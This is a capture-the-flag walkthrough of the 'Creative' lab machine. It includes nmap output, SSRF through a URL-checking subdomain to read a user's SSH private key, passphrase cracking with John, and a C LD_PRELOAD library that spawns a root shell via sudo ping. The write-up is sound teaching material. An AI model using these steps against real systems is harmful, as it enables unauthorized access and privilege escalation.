Creative
Exploit a vulnerable web application and some misconfigurations to gain root privileges.
Recon
Let's start with a nmap scan.
The Nmap scan results show only two open ports: port 22
, which is running SSH
, and port 80
, hosting a web server with nginx version 1.18.0
.
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 creative.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 11:48 BST
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 430.03 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -p 22,80 -sC -sV -T4 creative.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 11:56 BST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 11:56 (0:00:06 remaining)
Nmap scan report for creative.thm (10.10.127.96)
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
| 256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_ 256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Creative Studio | Free Bootstrap 4.3.x template
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.94 seconds
Visting the site, it seems to be a webpage for a UI/UX, Web Development and App Design services.

Ferox buster didn't reveal any directories worth looking at.
Subdomain enumeration revealed a subdomain beta.creative.thm
.

After adding it to /etc/hosts we can visit this site. We encounter a beta URL tester that checks if a provided URL is live or dead. If the URL is live, we get redirected to the corresponding page. This setup appears to be vulnerable to Server-Side Request Forgery (SSRF) exploitation.



We can utilize Ffuf
for port scanning by generating a port list using the seq
command. After a short duration, we identify port 1337
. The scan pauses briefly on port 5000
, likely due to the presence of beta.creative.thm
internally, causing a recursive call delay. However, the scan resumes shortly afterward.

Requesting the endpoint on 1337:
http://127.0.0.1:1337/


We make a request to the home directory and find a directory called saad
. Which has user.txt
.

Initial Access
We can also find the private SSH key of saad
in the .ssh
folder.
http://127.0.0.1:1337/home/saad/.ssh/id_rsa

After saving the key and adjusting permissions accordingly, we attempt to log in via SSH as Saad. However, we encounter a prompt requesting a passphrase for the SSH key.

We feed the SSH key into ssh2john
to produce a hash that can be cracked using John the Ripper.
Next, we crack the hash using John
with rockyou.txt
, and get the passphrase for the key.
┌──(kali㉿kali)-[~/Desktop/THM/creative]
└─$ ssh2john id_rsa > id_rsa.hash
┌──(kali㉿kali)-[~/Desktop/THM/creative]
└─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

With the passphrase obtained, we successfully log in and gain access as the user Saad
. In the user's home directory, we locate the first flag, which was previously accessible via the beta.creative.thm
website.

Privilege Escalation
sudo -l
asks for a password, however while enumerating the user's home directory, we discover a .bash_history
file containing valuable content. This file holds the credentials for the user Saad
.

With the obtained credentials, we successfully query sudo -l
. We find that we have permission to run /usr/bin/ping
with sudo privileges. However, this alone does not provide a straightforward path for privilege escalation.
Fortunately for us, there's another option available: env_keep+=LD_PRELOAD
.
LD_PRELOAD
is an environment variable commonly used on Unix-like systems to preload shared libraries before others when a program is executed. This enables overriding functions in other shared libraries.
If an attacker can manipulate LD_PRELOAD
to reference a malicious shared library, and if this environment variable is preserved when running commands with sudo, it presents an avenue for executing arbitrary code with elevated privileges.
We make use of a provided resource containing a previously mentioned shared library written in C. This library incorporates a function designed to elevate privileges to root by setting the user and group IDs to zero and spawning a shell. This effectively grants root shell access to the user.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
We compile the C
code into a shared library.
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
Next, we execute the ping command with sudo privileges while setting LD_PRELOAD
to the previously crafted shared library. This allows us to obtain a root shell, granting us access to extract the root flag located at /root
.
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping

Last updated
Was this helpful?